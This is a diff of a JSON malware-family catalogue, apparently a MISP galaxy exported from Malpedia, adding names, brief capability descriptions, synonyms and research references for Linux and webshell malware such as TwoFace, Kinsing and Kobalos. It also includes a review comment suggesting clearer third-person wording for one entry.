Commands supported by the payload are execution of programs, up-, download and deletion of files and capability to manipulate MAC timestamps.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/asp.twoface", - "https://unit42.paloaltonetworks.com/unit42-oilrig-performs-tests-twoface-webshell/", + "https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view", "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1536345486.pdf", - "https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/" + "https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", + "https://www.youtube.com/watch?v=GjquFKa4afU", + "https://www.youtube.com/watch?time_continue=1333&v=1CGAmjAV8nI", + "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", + "https://unit42.paloaltonetworks.com/unit42-oilrig-performs-tests-twoface-webshell/", + "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf" ], "synonyms": [ - "HyperShell" + "HighShell", + "HyperShell", + "Minion", + "SEASHARPEE" ], "type": [] }, 
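Review bot: The new TwoFace description keeps first-person passages from the Unit42 write-up — "which we call the payload" and "that we will discuss in further detail" — which read as if the galaxy author were speaking and point to detail that does not exist in this entry. Rephrasing in the third person, e.g. `The secondary webshell (the payload) is embedded within the loader in encrypted form and provides additional functionality`, and dropping the forward reference would make the entry self-contained. As the file is a Malpedia export, the wording should be corrected upstream so it is not overwritten on the next sync.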
@@ -1226,6 +2168,107 @@ "uuid": "d4318f40-a39a-4ce0-8d3c-246d9923d222", "value": "Unidentified ASP 001 (Webshell)" }, + { + "description": "A Linux backdoor that was apparently ported to Windows. This entry represents the Linux version. This version appears to have been written first and the Windows version was ported later, without full functionality. The Linux version offers persistence as well as some process manipulation techniques, though both versions apparently offer the ability to access the command line and execute programs as well as self-update.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.acbackdoor", + "https://www.bleepingcomputer.com/news/security/linux-windows-users-targeted-with-new-acbackdoor-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cd2d7040-edc4-4985-b708-b206b08cc1fe", + "value": "ACBackdoor (ELF)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.age_locker", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://twitter.com/IntezerLabs/status/1326880812344676352" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5d04aac3-fdf5-4922-9976-3a5a75e96e1a", + "value": "AgeLocker" + }, + { + "description": "AirDropBot is used to create a DDoS botnet. It spreads as a worm, currently targeting Linksys routers. Backdoor and other bot functionality is present in this family. Development seems to be ongoing. 
", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.airdrop", + "https://blog.malwaremustdie.org/2019/09/mmd-0064-2019-linuxairdropbot.html" + ], + "synonyms": [ + "CloudBot" + ], + "type": [] + }, + "uuid": "e91fcb82-e788-44cb-be5d-73b9601b9533", + "value": "AirDropBot" + }, + { + "description": "Honeypot-aware variant of Mirai.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.aisuru", + "https://insights.oem.avira.com/new-mirai-variant-aisuru-detects-cowrie-opensource-honeypots/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e288425b-40f0-441e-977f-5f1264ed61b6", + "value": "Aisuru" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.anchor_dns", + "https://www.netscout.com/blog/asert/dropping-anchor", + "https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns", + "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", + "https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b88dc3ec-d94c-4e6e-a846-5d07130df550", + "value": "Anchor_DNS" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.angryrebel", + "https://www.secureworks.com/research/threat-profiles/bronze-olive", + "https://news.sophos.com/wp-content/uploads/2020/02/CloudSnooper_report.pdf" + ], + "synonyms": [ + "Ghost RAT" + ], + "type": [] + }, + "uuid": "6cb47609-b03e-43d9-a4c7-8342f1011f3b", + "value": "ANGRYREBEL" + }, + { + "description": "Azazel is a Linux user-mode rootkit based off of a technique from the Jynx rootkit (LD_PRELOAD technique). 
Azazel is purportedly more robust than Jynx and has many more anti-analysis features ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.azazel", + "https://github.com/chokepoint/azazel" + ], + "synonyms": [], + "type": [] + }, + "uuid": "37374572-3346-4c00-abc9-9f6883c8866e", + "value": "azazel" + }, { "description": "", "meta": { @@ -1244,9 +2287,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite", - "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/", - "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", - "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/" + "https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/", + "https://blog.netlab.360.com/the-gafgyt-variant-vbot-and-its-31-campaigns/", + "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/", + "https://www.avira.com/en/blog/a-gafgyt-variant-that-exploits-pulse-secure-cve-2020-8218", + "https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/" ], "synonyms": [ "Gafgyt", 
@@ -1273,6 +2319,49 @@ "uuid": "d8dd47a5-85fe-4f07-89dc-00301468d209", "value": "BCMPUPnP_Hunter" }, + { + "description": "A DDoS bot abusing CVE-2020-8515 to target DrayTek Vigor routers. It uses a wordlist-based DGA to generate its C&C domains.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bigviktor", + "https://blog.netlab.360.com/bigviktor-dga-botnet/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "901ab128-2d23-41d7-a9e7-6a34e281804e", + "value": "BigViktor" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackrota", + "https://www.kryptoslogic.com/blog/2020/12/automated-string-de-gobfuscation/", + "https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go-en/", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a30aedcc-562e-437a-827c-55bc00cf3506", + "value": "Blackrota" + }, + { + "description": "This is a pentesting tool and according to the author, \"BOtB is a container analysis and exploitation tool designed to be used by pentesters and engineers while also being CI/CD friendly with common CI/CD technologies.\".\r\n\r\nIt has been observed being used by TeamTNT in their activities for spreading crypto-mining malware.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.botb", + "https://github.com/brompwnie/botb" + ], + "synonyms": [ + "BOtB" + ], + "type": [] + }, + "uuid": "57c9ab70-7133-441a-af66-10c0e4eb898b", + "value": "Break out the Box" + }, { "description": "This is in the same family as eBury, Calfbot, and is also likely related to DarkLeech", "meta": { 
@@ -1292,6 +2381,45 @@ "uuid": "bb9eaaec-97c9-4014-94dd-129cecf31ff0", "value": "CDorked" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdrthief", + "https://www.welivesecurity.com/2020/09/10/who-callin-cdrthief-linux-voip-softswitches/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "27d06ac9-42c4-433a-b1d7-660710d9e8df", + "value": "CDRThief" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cephei", + "https://cybersecurity.att.com/blogs/labs-research/malware-using-new-ezuri-memory-loader" + ], + "synonyms": [], + "type": [] + }, + "uuid": "baa0704b-50d8-48af-91e1-049f30f422cc", + "value": "Cephei" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cetus", + "https://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7a226df2-9599-4002-9a38-b044e16f76a9", + "value": "Cetus" + }, { "description": "", "meta": { 
@@ -1306,6 +2434,37 @@ "uuid": "700366d8-4036-4e48-9a5f-bd6e09fb9b6b", "value": "Chapro" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cloud_snooper", + "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", + "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://news.sophos.com/wp-content/uploads/2020/02/CloudSnooper_report.pdf" + ], + "synonyms": [ + "Snoopy" + ], + "type": [] + }, + "uuid": "0b1c514d-f617-4380-a28c-a1ed305a7538", + "value": "Cloud Snooper" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.corona", + "https://maxkersten.nl/binary-analysis-course/malware-analysis/corona-ddos-bot/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "591b15c3-ab72-49ce-981a-e6e21e506e52", + "value": "Corona DDOS Bot" + }, { "description": "This was observed to be pushed by IoT malware, abusing devices for LiteCoin and BitCoin mining.", "meta": { 
@@ -1336,17 +2495,94 @@ "uuid": "196b20ec-c3d1-4136-ab94-a2a6cc150e74", "value": "Cr1ptT0r" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.dacls", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/", + "https://blog.netlab.360.com/dacls-the-dual-platform-rat/", + "https://www.sygnia.co/mata-framework", + "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", + "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2e5e2a7e-4ee5-4954-9c92-e9b21649ae1b", + "value": "Dacls (ELF)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.darknexus", + "https://www.stratosphereips.org/blog/2020/6/8/dark-nexus-the-old-the-new-and-the-ugly" + ], + "synonyms": [], + "type": [] + }, + "uuid": "dfba0c8f-9d06-448b-817e-6fffa1b22cb9", + "value": "Dark Nexus" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ddoor", + "https://github.com/rek7/ddoor" + ], + "synonyms": [], + "type": [] + }, + "uuid": "07f48866-647c-46b0-a0d4-29c81ad488a8", + "value": "ddoor" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.doki", + "https://www.securecoding.com/blog/all-about-doki-malware/", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://www.intezer.com/container-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/" + ], + "synonyms": [], + "type": [] + }, + 
"uuid": "a5446b35-8613-4121-ada4-c0b1d6f72851", + "value": "Doki" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.doublefantasy", + "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", + "https://www.antiy.com/response/FROM_EQUATION_TO_EQUATIONS.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a41d8c89-8229-4936-96c2-4b194ebaf858", + "value": "DoubleFantasy (ELF)" + }, { "description": "This payload has been used to compromise kernel.org back in August of 2011 and has hit cPanel Support which in turn, has infected quite a few cPanel servers. It is a credential stealing payload which steals SSH keys, passwords, and potentially other credentials.\r\n\r\nThis family is part of a wider range of tools which are described in detail in the operation windigo whitepaper by ESET.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury", "https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf", - "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/", + "https://security.web.cern.ch/security/advisories/windigo/windigo.shtml", + "https://www.welivesecurity.com/2018/12/05/dark-side-of-the-forsshe/", "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/", "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy", "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", - "https://www.welivesecurity.com/2018/12/05/dark-side-of-the-forsshe/" + "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/" ], "synonyms": [], "type": [] 
@@ -1354,6 +2590,22 @@ "uuid": "ce79265c-a467-4a17-b27d-7ec7954688d5", "value": "Ebury" }, + { + "description": "The latest in this long line of Mirai scourges is a new variant named Echobot. Coming to life in mid-May, the malware was first described by Palo Alto Networks in a report published at the start of June, and then again in a report by security researchers from Akamai, in mid-June.\r\n\r\nWhen it was first spotted by Palo Alto Networks researchers in early June, Echobot was using exploits for 18 vulnerabilities. In the Akamai report, a week later, Echobot was at 26.\r\n\r\nhttps://www.zdnet.com/article/new-echobot-malware-is-a-smorgasbord-of-vulnerabilities", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.echobot", + "https://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada", + "https://www.bleepingcomputer.com/news/security/new-echobot-botnet-variant-uses-over-50-exploits-to-propagate/", + "https://blogs.akamai.com/sitr/2019/06/latest-echobot-26-infection-vectors.html", + "https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "040ac9c6-e3ab-4b51-88a9-5380101c74f8", + "value": "Echobot" + }, { "description": "", "meta": { 
@@ -1367,6 +2619,38 @@ "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864", "value": "Erebus (ELF)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.evilgnome", + "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", + "https://www.intezer.com/blog-evilgnome-rare-malware-spying-on-linux-desktop-users/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "149e693c-4b51-4143-9061-6a8698b0e7f5", + "value": "EvilGnome" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.exaramel", + "https://www.wired.com/story/sandworm-centreon-russia-hack/", + "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", + "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", + "https://twitter.com/craiu/status/1361581668092493824", + "https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1e0540f3-bad3-403f-b8ed-ce40a276559e", + "value": "Exaramel (ELF)" + }, { "description": "", "meta": { @@ -1385,7 +2669,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.fbot", - "https://securitynews.sonicwall.com/xmlpost/vigilante-malware-removes-cryptominers-from-the-infected-device/" + "https://blog.malwaremustdie.org/2020/01/mmd-0065-2020-linuxmirai-fbot.html", + "https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html", + "https://securitynews.sonicwall.com/xmlpost/vigilante-malware-removes-cryptominers-from-the-infected-device/", + "https://blog.netlab.360.com/fbot-is-now-riding-the-traffic-and-transportation-smart-devices-en/" ], "synonyms": [], "type": [] 
@@ -1393,6 +2680,99 @@ "uuid": "501e5434-5796-4d63-8539-d99ec48119c2", "value": "FBot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.finfisher", + "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/", + "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "44018d71-25fb-4959-b61e-d7af97c85131", + "value": "FinFisher (ELF)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.floodor", + "https://github.com/Thibault-69/Floodor" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ac30f2be-8153-4588-b29c-5e5863792930", + "value": "floodor" + }, + { + "description": "Guardicore has discovered FritzFrog, a sophisticated peer-to-peer (P2P) botnet which has been actively breaching SSH servers since January 2020. It is a worm which is written in Golang, and is modular, multi-threaded and fileless, leaving no trace on the infected machine\u2019s disk. 
", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.fritzfrog", + "https://www.guardicore.com/2020/08/fritzfrog-p2p-botnet-infects-ssh-servers/", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b43b7b4a-9cf4-4f98-b4d2-617a7d84bfa7", + "value": "FritzFrog" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.gitpaste12", + "https://blogs.juniper.net/en-us/threat-research/gitpaste-12" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ffd09324-b585-49c0-97e5-536d386f49a5", + "value": "Gitpaste-12" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.godlua", + "https://blog.netlab.360.com/an-analysis-of-godlua-backdoor-en/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f3cb0a78-1608-44b1-9949-c6addf6c13ce", + "value": "Godlua" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.gosh", + "https://twitter.com/IntezerLabs/status/1291355808811409408" + ], + "synonyms": [], + "type": [] + }, + "uuid": "931f57f9-1edd-47b8-bf80-ae7190434558", + "value": "GOSH" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.greedyantd", + "https://www.intezer.com/blog-technical-analysis-cryptocurrency-mining-war-on-the-cloud/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6aee7daf-9f63-4a70-bfe5-9c95cbdcb1e3", + "value": "GreedyAntd" + }, { "description": "", "meta": { 
@@ -1412,7 +2792,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hajime", "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf", - "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", + "https://par.nsf.gov/servlets/purl/10096257", "https://x86.re/blog/hajime-a-follow-up/", "http://blog.netlab.360.com/hajime-status-report-en/", "https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things", @@ -1439,6 +2819,49 @@ "uuid": "0839c28a-ea11-44d4-93d1-24b246ef6743", "value": "Hakai" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.handymannypot", + "https://twitter.com/liuya0904/status/1171633662502350848" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0b323b91-ad57-4127-99d1-6a2485be70df", + "value": "HandyMannyPot" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hand_of_thief", + "https://blog.avast.com/2013/08/27/linux-trojan-hand-of-thief-ungloved/", + "https://web.archive.org/web/20130815040638/https://blogs.rsa.com/thieves-reaching-for-linux-hand-of-thief-trojan-targets-linux-inth3wild/" + ], + "synonyms": [ + "Hanthie" + ], + "type": [] + }, + "uuid": "db3e17f0-677b-4bdb-bc26-25e62a74673d", + "value": "Hand of Thief" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hiddenwasp", + "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", + "https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ae00d48d-c515-4ca9-a29c-8c53a78f8c73", + "value": "HiddenWasp" + }, { "description": "", "meta": { 
@@ -1462,6 +2885,19 @@ "uuid": "41bf8f3e-bb6a-445d-bb74-d08aae61a94b", "value": "Hide and Seek" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.icnanker", + "https://blog.netlab.360.com/icnanker-trojan-downloader-shc-en/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cd9f128b-6502-4e1b-a5b3-25f3c7f01ca3", + "value": "Icnanker" + }, { "description": "", "meta": { @@ -1469,18 +2905,36 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.iot_reaper", "http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/", "https://krebsonsecurity.com/2017/10/reaper-calm-before-the-iot-security-storm", - "https://research.checkpoint.com/new-iot-botnet-storm-coming/", - "https://embedi.com/blog/grim-iot-reaper-1-and-0-day-vulnerabilities-at-the-service-of-botnets/" + "https://research.checkpoint.com/new-iot-botnet-storm-coming/" ], "synonyms": [ "IoTroop", - "Reaper" + "Reaper", + "iotreaper" ], "type": [] }, "uuid": "37c357a1-ec09-449f-b5a9-c1ef1fba2de2", "value": "IoT Reaper" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ipstorm", + "https://www.anomali.com/blog/the-interplanetary-storm-new-malware-in-wild-using-interplanetary-file-systems-ipfs-p2p-network", + "https://www.bitdefender.com/files/News/CaseStudies/study/376/Bitdefender-Whitepaper-IPStorm.pdf", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://www.intezer.com/blog/research/a-storm-is-brewing-ipstorm-now-has-linux-malware/" + ], + "synonyms": [ + "InterPlanetary Storm" + ], + "type": [] + }, + "uuid": "a24f9c4b-1fa7-4da2-9929-064345389e67", + "value": "IPStorm (ELF)" + }, { "description": "", "meta": { 
@@ -1494,12 +2948,30 @@ "uuid": "6a4365fc-8448-4270-ba93-0341788d004b", "value": "JenX" }, + { + "description": "Surfaced in late April 2020, Intezer describes Kaiji as a DDoS malware written in Go that spreads through SSH brute force attacks. Recovered function names are an English representation of Chinese words, hinting about the origin. The name Kaiji was given by MalwareMustDie based on strings found in samples.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiji", + "https://intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://www.bitdefender.com/box/blog/iot-news/kaiji-new-strain-iot-malware-seizing-control-launching-ddos-attacks/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "33fe7943-c1b3-48d5-b287-126390b091f0", + "value": "Kaiji" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiten", - "https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf" + "https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf", + "https://www.trendmicro.com/en_us/research/20/i/exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html", + "https://www.blackarrow.net/attackers-abuse-mobileirons-rce-to-deliver-kaiten/" ], "synonyms": [ "STD" 
@@ -1509,6 +2981,60 @@ "uuid": "9b618703-58f6-4f0b-83a4-d4f13e2e5d12", "value": "Kaiten" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kerberods", + "https://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916", + "https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/", + "https://www.fortinet.com/blog/threat-research/rocke-variant-ready-to-box-mining-challengers.html", + "https://blog.talosintelligence.com/2019/09/watchbog-patching.html", + "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e3787d95-2595-449e-8cf9-90845a9b7444", + "value": "kerberods" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kinsing", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://unit42.paloaltonetworks.com/cve-2020-25213/", + "https://redcanary.com/blog/kinsing-malware-citrix-saltstack/", + "https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces", + "https://twitter.com/IntezerLabs/status/1259818964848386048", + "https://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743", + "https://www.trendmicro.com/en_us/research/20/k/analysis-of-kinsing-malwares-use-of-rootkit.html", + "https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability" + ], + "synonyms": [ + "h2miner" + ], + "type": [] + }, + "uuid": "ef0e3a56-e614-4dc1-bb20-0dcf7215c1ea", + "value": "Kinsing" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kobalos", + "https://team-cymru.com/blog/2021/02/05/kobalos-malware-mapping/", + 
"https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf", + "https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "201d54ae-7fb0-4522-888c-758fa9019737", + "value": "Kobalos" + }, { "description": "", "meta": { 
@@ -1522,6 +3048,105 @@ "uuid": "f8b91c34-b4f0-4ef2-b9fb-15bd5ec0a66d", "value": "Lady" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.leethozer", + "https://blog.netlab.360.com/the-leethozer-botnet-en/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e9f2857a-cb91-4715-ac8b-fdc89bc9a03e", + "value": "LeetHozer" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.lilock", + "https://www.bleepingcomputer.com/news/security/lilocked-ransomware-actively-targeting-servers-and-web-sites/", + "https://fossbytes.com/lilocked-ransomware-infected-linux-servers/", + "https://id-ransomware.blogspot.com/2019/07/lilu-lilocked-ransomware.html" + ], + "synonyms": [ + "Lilocked", + "Lilu" + ], + "type": [] + }, + "uuid": "1328ed0d-9c1c-418b-9a96-1c538e4893bc", + "value": "LiLock" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.lilyofthevalley", + "https://github.com/En14c/LilyOfTheValley" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f789442f-8f50-4e55-8fbc-b93d22b5314e", + "value": "lilyofthevalley" + }, + { + "description": "BitDefender tracked the development of a Mirai-inspired botnet, dubbed LiquorBot, which seems to be actively in development and has recently incorporated Monero cryptocurrency mining features. Interestingly, LiquorBot is written in Go (also known as Golang), which offers some programming advantages over traditional C-style code, such as memory safety, garbage collection, structural typing, and even CSP-style concurrency. 
